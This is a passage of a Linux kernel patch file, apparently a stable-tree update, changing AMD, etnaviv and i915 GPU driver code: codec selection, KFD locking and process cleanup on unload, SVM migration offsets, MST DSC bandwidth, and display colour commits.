++			if ((adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) ||
++			!amdgpu_sriov_is_av1_support(adev)) {
++				if (encode)
++					*codecs = &sriov_vcn_4_0_0_video_codecs_encode_vcn1;
++				else
++					*codecs = &sriov_vcn_4_0_0_video_codecs_decode_vcn1;
++			} else {
++				if (encode)
++					*codecs = &sriov_vcn_4_0_0_video_codecs_encode_vcn0;
++				else
++					*codecs = &sriov_vcn_4_0_0_video_codecs_decode_vcn0;
++			}
+ 		} else {
+-			if (encode)
+-				*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
+-			else
+-				*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++			if ((adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0)) {
++				if (encode)
++					*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
++				else
++					*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++			} else {
++				if (encode)
++					*codecs = &vcn_4_0_0_video_codecs_encode_vcn0;
++				else
++					*codecs = &vcn_4_0_0_video_codecs_decode_vcn0;
++			}
+ 		}
+ 		return 0;
+ 	default:
+@@ -729,8 +797,23 @@ static int soc21_common_late_init(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
+-	if (amdgpu_sriov_vf(adev))
++	if (amdgpu_sriov_vf(adev)) {
+ 		xgpu_nv_mailbox_get_irq(adev);
++		if ((adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) ||
++		!amdgpu_sriov_is_av1_support(adev)) {
++			amdgpu_virt_update_sriov_video_codec(adev,
++							     sriov_vcn_4_0_0_video_codecs_encode_array_vcn1,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn1),
++							     sriov_vcn_4_0_0_video_codecs_decode_array_vcn1,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn1));
++		} else {
++			amdgpu_virt_update_sriov_video_codec(adev,
++							     sriov_vcn_4_0_0_video_codecs_encode_array_vcn0,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn0),
++							     sriov_vcn_4_0_0_video_codecs_decode_array_vcn0,
++							     ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn0));
++		}
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index f79b8e964140e..e191d38f3da62 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1298,14 +1298,14 @@ static int kfd_ioctl_map_memory_to_gpu(struct file *filep,
+ 		args->n_success = i+1;
+ 	}
+ 
+-	mutex_unlock(&p->mutex);
+-
+ 	err = amdgpu_amdkfd_gpuvm_sync_memory(dev->adev, (struct kgd_mem *) mem, true);
+ 	if (err) {
+ 		pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 		goto sync_memory_failed;
+ 	}
+ 
++	mutex_unlock(&p->mutex);
++
+ 	/* Flush TLBs after waiting for the page table updates to complete */
+ 	for (i = 0; i < args->n_devices; i++) {
+ 		peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1321,9 +1321,9 @@ get_process_device_data_failed:
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ map_memory_to_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 
+ 	return err;
+@@ -1337,6 +1337,7 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 	void *mem;
+ 	long err = 0;
+ 	uint32_t *devices_arr = NULL, i;
++	bool flush_tlb;
+ 
+ 	if (!args->n_devices) {
+ 		pr_debug("Device IDs array empty\n");
+@@ -1389,16 +1390,19 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 		}
+ 		args->n_success = i+1;
+ 	}
+-	mutex_unlock(&p->mutex);
+ 
+-	if (kfd_flush_tlb_after_unmap(pdd->dev)) {
++	flush_tlb = kfd_flush_tlb_after_unmap(pdd->dev);
++	if (flush_tlb) {
+ 		err = amdgpu_amdkfd_gpuvm_sync_memory(pdd->dev->adev,
+ 				(struct kgd_mem *) mem, true);
+ 		if (err) {
+ 			pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 			goto sync_memory_failed;
+ 		}
++	}
++	mutex_unlock(&p->mutex);
+ 
++	if (flush_tlb) {
+ 		/* Flush TLBs after waiting for the page table updates to complete */
+ 		for (i = 0; i < args->n_devices; i++) {
+ 			peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1414,9 +1418,9 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ unmap_memory_from_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 	return err;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+index 10048ce16aea4..5c8506f180140 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+@@ -289,7 +289,7 @@ static unsigned long svm_migrate_unsuccessful_pages(struct migrate_vma *migrate)
+ static int
+ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			 struct migrate_vma *migrate, struct dma_fence **mfence,
+-			 dma_addr_t *scratch)
++			 dma_addr_t *scratch, uint64_t ttm_res_offset)
+ {
+ 	uint64_t npages = migrate->npages;
+ 	struct device *dev = adev->dev;
+@@ -299,19 +299,13 @@ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	uint64_t i, j;
+ 	int r;
+ 
+-	pr_debug("svms 0x%p [0x%lx 0x%lx]\n", prange->svms, prange->start,
+-		 prange->last);
++	pr_debug("svms 0x%p [0x%lx 0x%lx 0x%llx]\n", prange->svms, prange->start,
++		 prange->last, ttm_res_offset);
+ 
+ 	src = scratch;
+ 	dst = (uint64_t *)(scratch + npages);
+ 
+-	r = svm_range_vram_node_new(adev, prange, true);
+-	if (r) {
+-		dev_dbg(adev->dev, "fail %d to alloc vram\n", r);
+-		goto out;
+-	}
+-
+-	amdgpu_res_first(prange->ttm_res, prange->offset << PAGE_SHIFT,
++	amdgpu_res_first(prange->ttm_res, ttm_res_offset,
+ 			 npages << PAGE_SHIFT, &cursor);
+ 	for (i = j = 0; i < npages; i++) {
+ 		struct page *spage;
+@@ -391,14 +385,14 @@ out_free_vram_pages:
+ 		migrate->dst[i + 3] = 0;
+ 	}
+ #endif
+-out:
++
+ 	return r;
+ }
+ 
+ static long
+ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			struct vm_area_struct *vma, uint64_t start,
+-			uint64_t end, uint32_t trigger)
++			uint64_t end, uint32_t trigger, uint64_t ttm_res_offset)
+ {
+ 	struct kfd_process *p = container_of(prange->svms, struct kfd_process, svms);
+ 	uint64_t npages = (end - start) >> PAGE_SHIFT;
+@@ -451,7 +445,7 @@ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	else
+ 		pr_debug("0x%lx pages migrated\n", cpages);
+ 
+-	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch);
++	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch, ttm_res_offset);
+ 	migrate_vma_pages(&migrate);
+ 
+ 	pr_debug("successful/cpages/npages 0x%lx/0x%lx/0x%lx\n",
+@@ -499,6 +493,7 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	unsigned long addr, start, end;
+ 	struct vm_area_struct *vma;
+ 	struct amdgpu_device *adev;
++	uint64_t ttm_res_offset;
+ 	unsigned long cpages = 0;
+ 	long r = 0;
+ 
+@@ -520,6 +515,13 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	start = prange->start << PAGE_SHIFT;
+ 	end = (prange->last + 1) << PAGE_SHIFT;
+ 
++	r = svm_range_vram_node_new(adev, prange, true);
++	if (r) {
++		dev_dbg(adev->dev, "fail %ld to alloc vram\n", r);
++		return r;
++	}
++	ttm_res_offset = prange->offset << PAGE_SHIFT;
++
+ 	for (addr = start; addr < end;) {
+ 		unsigned long next;
+ 
+@@ -528,18 +530,21 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 			break;
+ 
+ 		next = min(vma->vm_end, end);
+-		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger);
++		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger, ttm_res_offset);
+ 		if (r < 0) {
+ 			pr_debug("failed %ld to migrate\n", r);
+ 			break;
+ 		} else {
+ 			cpages += r;
+ 		}
++		ttm_res_offset += next - addr;
+ 		addr = next;
+ 	}
+ 
+ 	if (cpages)
+ 		prange->actual_loc = best_loc;
++	else
++		svm_range_vram_node_free(prange);
+ 
+ 	return r < 0 ? r : 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_module.c b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+index 09b966dc37681..aee2212e52f69 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_module.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+@@ -77,6 +77,7 @@ err_ioctl:
+ 
+ static void kfd_exit(void)
+ {
++	kfd_cleanup_processes();
+ 	kfd_debugfs_fini();
+ 	kfd_process_destroy_wq();
+ 	kfd_procfs_shutdown();
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index 552c3ac85a132..7dc55919993c0 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -926,6 +926,7 @@ bool kfd_dev_is_large_bar(struct kfd_dev *dev);
+ 
+ int kfd_process_create_wq(void);
+ void kfd_process_destroy_wq(void);
++void kfd_cleanup_processes(void);
+ struct kfd_process *kfd_create_process(struct file *filep);
+ struct kfd_process *kfd_get_process(const struct task_struct *task);
+ struct kfd_process *kfd_lookup_process_by_pasid(u32 pasid);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index 51b1683ac5c1e..4d9f2d1c49b1d 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -1167,6 +1167,17 @@ static void kfd_process_free_notifier(struct mmu_notifier *mn)
+ 	kfd_unref_process(container_of(mn, struct kfd_process, mmu_notifier));
+ }
+ 
++static void kfd_process_notifier_release_internal(struct kfd_process *p)
++{
++	cancel_delayed_work_sync(&p->eviction_work);
++	cancel_delayed_work_sync(&p->restore_work);
++
++	/* Indicate to other users that MM is no longer valid */
++	p->mm = NULL;
++
++	mmu_notifier_put(&p->mmu_notifier);
++}
++
+ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 					struct mm_struct *mm)
+ {
+@@ -1181,17 +1192,22 @@ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 		return;
+ 
+ 	mutex_lock(&kfd_processes_mutex);
++	/*
++	 * Do early return if table is empty.
++	 *
++	 * This could potentially happen if this function is called concurrently
++	 * by mmu_notifier and by kfd_cleanup_pocesses.
++	 *
++	 */
++	if (hash_empty(kfd_processes_table)) {
++		mutex_unlock(&kfd_processes_mutex);
++		return;
++	}
+ 	hash_del_rcu(&p->kfd_processes);
+ 	mutex_unlock(&kfd_processes_mutex);
+ 	synchronize_srcu(&kfd_processes_srcu);
+ 
+-	cancel_delayed_work_sync(&p->eviction_work);
+-	cancel_delayed_work_sync(&p->restore_work);
+-
+-	/* Indicate to other users that MM is no longer valid */
+-	p->mm = NULL;
+-
+-	mmu_notifier_put(&p->mmu_notifier);
++	kfd_process_notifier_release_internal(p);
+ }
+ 
+ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+@@ -1200,6 +1216,43 @@ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+ 	.free_notifier = kfd_process_free_notifier,
+ };
+ 
++/*
++ * This code handles the case when driver is being unloaded before all
++ * mm_struct are released.  We need to safely free the kfd_process and
++ * avoid race conditions with mmu_notifier that might try to free them.
++ *
++ */
++void kfd_cleanup_processes(void)
++{
++	struct kfd_process *p;
++	struct hlist_node *p_temp;
++	unsigned int temp;
++	HLIST_HEAD(cleanup_list);
++
++	/*
++	 * Move all remaining kfd_process from the process table to a
++	 * temp list for processing.   Once done, callback from mmu_notifier
++	 * release will not see the kfd_process in the table and do early return,
++	 * avoiding double free issues.
++	 */
++	mutex_lock(&kfd_processes_mutex);
++	hash_for_each_safe(kfd_processes_table, temp, p_temp, p, kfd_processes) {
++		hash_del_rcu(&p->kfd_processes);
++		synchronize_srcu(&kfd_processes_srcu);
++		hlist_add_head(&p->kfd_processes, &cleanup_list);
++	}
++	mutex_unlock(&kfd_processes_mutex);
++
++	hlist_for_each_entry_safe(p, p_temp, &cleanup_list, kfd_processes)
++		kfd_process_notifier_release_internal(p);
++
++	/*
++	 * Ensures that all outstanding free_notifier get called, triggering
++	 * the release of the kfd_process struct.
++	 */
++	mmu_notifier_synchronize();
++}
++
+ static int kfd_process_init_cwsr_apu(struct kfd_process *p, struct file *filep)
+ {
+ 	unsigned long  offset;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+index 5137476ec18e6..4236539d9f932 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+@@ -218,8 +218,8 @@ static int init_user_queue(struct process_queue_manager *pqm,
+ 	return 0;
+ 
+ cleanup:
+-	if (dev->shared_resources.enable_mes)
+-		uninit_queue(*q);
++	uninit_queue(*q);
++	*q = NULL;
+ 	return retval;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c
+index a7fd98f57f94c..dc62375a8e2c4 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_hdcp.c
+@@ -495,7 +495,7 @@ static void update_config(void *handle, struct cp_psp_stream_config *config)
+ 	link->dp.mst_enabled = config->mst_enabled;
+ 	link->dp.usb4_enabled = config->usb4_enabled;
+ 	display->adjust.disable = MOD_HDCP_DISPLAY_DISABLE_AUTHENTICATION;
+-	link->adjust.auth_delay = 0;
++	link->adjust.auth_delay = 2;
+ 	link->adjust.hdcp1.disable = 0;
+ 	conn_state = aconnector->base.state;
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index abdbd4352f6f3..60dd88666437d 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -208,6 +208,21 @@ bool needs_dsc_aux_workaround(struct dc_link *link)
+ 	return false;
+ }
+ 
++bool is_synaptics_cascaded_panamera(struct dc_link *link, struct drm_dp_mst_port *port)
++{
++	u8 branch_vendor_data[4] = { 0 }; // Vendor data 0x50C ~ 0x50F
++
++	if (drm_dp_dpcd_read(port->mgr->aux, DP_BRANCH_VENDOR_SPECIFIC_START, &branch_vendor_data, 4) == 4) {
++		if (link->dpcd_caps.branch_dev_id == DP_BRANCH_DEVICE_ID_90CC24 &&
++				IS_SYNAPTICS_CASCADED_PANAMERA(link->dpcd_caps.branch_dev_name, branch_vendor_data)) {
++			DRM_INFO("Synaptics Cascaded MST hub\n");
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnector)
+ {
+ 	struct dc_sink *dc_sink = aconnector->dc_sink;
+@@ -231,6 +246,10 @@ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnecto
+ 	    needs_dsc_aux_workaround(aconnector->dc_link))
+ 		aconnector->dsc_aux = &aconnector->mst_port->dm_dp_aux.aux;
+ 
++	/* synaptics cascaded MST hub case */
++	if (!aconnector->dsc_aux && is_synaptics_cascaded_panamera(aconnector->dc_link, port))
++		aconnector->dsc_aux = port->mgr->aux;
++
+ 	if (!aconnector->dsc_aux)
+ 		return false;
+ 
+@@ -627,12 +646,25 @@ struct dsc_mst_fairness_params {
+ 	struct amdgpu_dm_connector *aconnector;
+ };
+ 
+-static int kbps_to_peak_pbn(int kbps)
++static uint16_t get_fec_overhead_multiplier(struct dc_link *dc_link)
++{
++	u8 link_coding_cap;
++	uint16_t fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B;
++
++	link_coding_cap = dc_link_dp_mst_decide_link_encoding_format(dc_link);
++	if (link_coding_cap == DP_128b_132b_ENCODING)
++		fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B;
++
++	return fec_overhead_multiplier_x1000;
++}
++
++static int kbps_to_peak_pbn(int kbps, uint16_t fec_overhead_multiplier_x1000)
+ {
+ 	u64 peak_kbps = kbps;
+ 
+ 	peak_kbps *= 1006;
+-	peak_kbps = div_u64(peak_kbps, 1000);
++	peak_kbps *= fec_overhead_multiplier_x1000;
++	peak_kbps = div_u64(peak_kbps, 1000 * 1000);
+ 	return (int) DIV64_U64_ROUND_UP(peak_kbps * 64, (54 * 8 * 1000));
+ }
+ 
+@@ -726,11 +758,12 @@ static int increase_dsc_bpp(struct drm_atomic_state *state,
+ 	int link_timeslots_used;
+ 	int fair_pbn_alloc;
+ 	int ret = 0;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled) {
+ 			initial_slack[i] =
+-			kbps_to_peak_pbn(params[i].bw_range.max_kbps) - vars[i + k].pbn;
++			kbps_to_peak_pbn(params[i].bw_range.max_kbps, fec_overhead_multiplier_x1000) - vars[i + k].pbn;
+ 			bpp_increased[i] = false;
+ 			remaining_to_increase += 1;
+ 		} else {
+@@ -826,6 +859,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 	int next_index;
+ 	int remaining_to_try = 0;
+ 	int ret;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled
+@@ -855,7 +889,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 		if (next_index == -1)
+ 			break;
+ 
+-		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps);
++		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		ret = drm_dp_atomic_find_time_slots(state,
+ 						    params[next_index].port->mgr,
+ 						    params[next_index].port,
+@@ -868,7 +902,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 			vars[next_index].dsc_enabled = false;
+ 			vars[next_index].bpp_x16 = 0;
+ 		} else {
+-			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps);
++			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps, fec_overhead_multiplier_x1000);
+ 			ret = drm_dp_atomic_find_time_slots(state,
+ 							    params[next_index].port->mgr,
+ 							    params[next_index].port,
+@@ -897,6 +931,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	int count = 0;
+ 	int i, k, ret;
+ 	bool debugfs_overwrite = false;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	memset(params, 0, sizeof(params));
+ 
+@@ -958,7 +993,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try no compression */
+ 	for (i = 0; i < count; i++) {
+ 		vars[i + k].aconnector = params[i].aconnector;
+-		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		vars[i + k].dsc_enabled = false;
+ 		vars[i + k].bpp_x16 = 0;
+ 		ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr, params[i].port,
+@@ -977,7 +1012,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try max compression */
+ 	for (i = 0; i < count; i++) {
+ 		if (params[i].compression_possible && params[i].clock_force_enable != DSC_CLK_FORCE_DISABLE) {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = true;
+ 			vars[i + k].bpp_x16 = params[i].bw_range.min_target_bpp_x16;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+@@ -985,7 +1020,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 			if (ret < 0)
+ 				return ret;
+ 		} else {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = false;
+ 			vars[i + k].bpp_x16 = 0;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+index 97fd70df531bf..1e4ede1e57abd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+@@ -34,6 +34,21 @@
+ #define SYNAPTICS_RC_OFFSET        0x4BC
+ #define SYNAPTICS_RC_DATA          0x4C0
+ 
++#define DP_BRANCH_VENDOR_SPECIFIC_START 0x50C
++
++/**
++ * Panamera MST Hub detection
++ * Offset DPCD 050Eh == 0x5A indicates cascaded MST hub case
++ * Check from beginning of branch device vendor specific field (050Ch)
++ */
++#define IS_SYNAPTICS_PANAMERA(branchDevName) (((int)branchDevName[4] & 0xF0) == 0x50 ? 1 : 0)
++#define BRANCH_HW_REVISION_PANAMERA_A2 0x10
++#define SYNAPTICS_CASCADED_HUB_ID  0x5A
++#define IS_SYNAPTICS_CASCADED_PANAMERA(devName, data) ((IS_SYNAPTICS_PANAMERA(devName) && ((int)data[2] == SYNAPTICS_CASCADED_HUB_ID)) ? 1 : 0)
++
++#define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
++#define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000
++
+ struct amdgpu_display_manager;
+ struct amdgpu_dm_connector;
+ 
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+index 7031db145a77a..3524b5811682a 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+@@ -91,7 +91,15 @@ static void *etnaviv_gem_prime_vmap_impl(struct etnaviv_gem_object *etnaviv_obj)
+ static int etnaviv_gem_prime_mmap_obj(struct etnaviv_gem_object *etnaviv_obj,
+ 		struct vm_area_struct *vma)
+ {
+-	return dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	int ret;
++
++	ret = dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	if (!ret) {
++		/* Drop the reference acquired by drm_gem_mmap_obj(). */
++		drm_gem_object_put(&etnaviv_obj->base);
++	}
++
++	return ret;
+ }
+ 
+ static const struct etnaviv_gem_ops etnaviv_gem_prime_ops = {
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index 250e83f1f5ac0..c3928d28cd443 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -514,6 +514,22 @@ static void icl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ 	icl_load_csc_matrix(crtc_state);
+ }
+ 
++static void skl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
++{
++	/*
++	 * Possibly related to display WA #1184, SKL CSC loses the latched
++	 * CSC coeff/offset register values if the CSC registers are disarmed
++	 * between DC5 exit and PSR exit. This will cause the plane(s) to
++	 * output all black (until CSC_MODE is rearmed and properly latched).
++	 * Once PSR exit (and proper register latching) has occurred the
++	 * danger is over. Thus when PSR is enabled the CSC coeff/offset
++	 * register programming will be peformed from skl_color_commit_arm()
++	 * which is called after PSR exit.
++	 */
++	if (!crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++}
++
+ static void ilk_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ {
+ 	ilk_load_csc_matrix(crtc_state);
+@@ -556,6 +572,9 @@ static void skl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 	enum pipe pipe = crtc->pipe;
+ 	u32 val = 0;
+ 
++	if (crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++
+ 	/*
+ 	 * We don't (yet) allow userspace to control the pipe background color,
+ 	 * so force it to black, but apply pipe gamma and CSC appropriately
+@@ -574,6 +593,25 @@ static void skl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 			  crtc_state->csc_mode);
+ }
+ 
++static void icl_color_commit_arm(const struct intel_crtc_state *crtc_state)
++{
++	struct intel_crtc *crtc = to_intel_crtc(crtc_state->uapi.crtc);
++	struct drm_i915_private *i915 = to_i915(crtc->base.dev);
++	enum pipe pipe = crtc->pipe;
++
++	/*
++	 * We don't (yet) allow userspace to control the pipe background color,
++	 * so force it to black.
++	 */
++	intel_de_write(i915, SKL_BOTTOM_COLOR(pipe), 0);
++
++	intel_de_write(i915, GAMMA_MODE(crtc->pipe),
++		       crtc_state->gamma_mode);
++
++	intel_de_write_fw(i915, PIPE_CSC_MODE(crtc->pipe),
++			  crtc_state->csc_mode);
++}
++
+ static struct drm_property_blob *
+ create_linear_lut(struct drm_i915_private *i915, int lut_size)
+ {
+@@ -2287,14 +2325,14 @@ static const struct intel_color_funcs i9xx_color_funcs = {
+ static const struct intel_color_funcs icl_color_funcs = {
+ 	.color_check = icl_color_check,
+ 	.color_commit_noarm = icl_color_commit_noarm,
+-	.color_commit_arm = skl_color_commit_arm,
++	.color_commit_arm = icl_color_commit_arm,
+ 	.load_luts = icl_load_luts,
+ 	.read_luts = icl_read_luts,
+ };
+ 
+ static const struct intel_color_funcs glk_color_funcs = {
+ 	.color_check = glk_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = glk_load_luts,
+ 	.read_luts = glk_read_luts,
+@@ -2302,7 +2340,7 @@ static const struct intel_color_funcs glk_color_funcs = {
+ 
+ static const struct intel_color_funcs skl_color_funcs = {
+ 	.color_check = ivb_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = bdw_load_luts,
+ 	.read_luts = NULL,
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 8b6994853f6f8..f0aad2403109b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -7107,6 +7107,8 @@ static void intel_update_crtc(struct intel_atomic_state *state,
+ 
+ 	intel_fbc_update(state, crtc);
+ 
++	drm_WARN_ON(&i915->drm, !intel_display_power_is_enabled(i915, POWER_DOMAIN_DC_OFF));
++
+ 	if (!modeset &&
+ 	    intel_crtc_needs_color_update(new_crtc_state))
+ 		intel_color_commit_noarm(new_crtc_state);
+@@ -7480,8 +7482,28 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 	drm_atomic_helper_wait_for_dependencies(&state->base);
+ 	drm_dp_mst_atomic_wait_for_dependencies(&state->base);
+ 
+-	if (state->modeset)
+-		wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_MODESET);
++	/*
++	 * During full modesets we write a lot of registers, wait
++	 * for PLLs, etc. Doing that while DC states are enabled
++	 * is not a good idea.
++	 *
++	 * During fastsets and other updates we also need to
++	 * disable DC states due to the following scenario:
++	 * 1. DC5 exit and PSR exit happen
++	 * 2. Some or all _noarm() registers are written
++	 * 3. Due to some long delay PSR is re-entered
